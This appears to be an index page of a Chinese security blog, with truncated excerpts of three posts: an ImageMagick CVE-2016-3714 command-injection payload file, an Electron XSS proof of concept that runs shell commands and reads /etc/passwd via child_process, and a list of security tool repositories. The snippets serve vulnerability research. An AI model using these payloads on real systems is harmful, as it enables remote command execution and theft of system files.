最新发布 第2页

A0xpg博客欢迎你

未分类

ImageMagick exp

ImageMagick exp
引用:https://www.exploit-db.com/exploits/39767 CVE-2016-3714 RCE 分析 exploit.mvg -=-=-=-=-=-=-=-=- push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|ls "-la)' pop graphic-conte……继续阅读 »

Admin 2个月前 (07-03) 74浏览 0评论 0个赞

未分类

Electron XSS RCE POC

Electron XSS RCE POC
蚁剑用Electron开发,当前程序的上下文应该是node,于是我们可以调用node模块进行RCE POC <img src=# onerror="require('child_process').exec('cat /etc/passwd',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });"> 反弹shell requir……继续阅读 »

Admin 5个月前 (04-15) 293浏览 0评论 0个赞

未分类

优秀github项目收集

优秀github项目收集
赏金猎人漏洞详情 https://github.com/ngalongc/bug-bounty-reference/   fuzzdb https://github.com/fuzzdb-project/fuzzdb   扫描器 https://github.com/robertdavidgraham/masscan   安全从业人员常用工具及学习指引 https://github.co……继续阅读 »

Admin 6个月前 (03-22) 144浏览 0评论 0个赞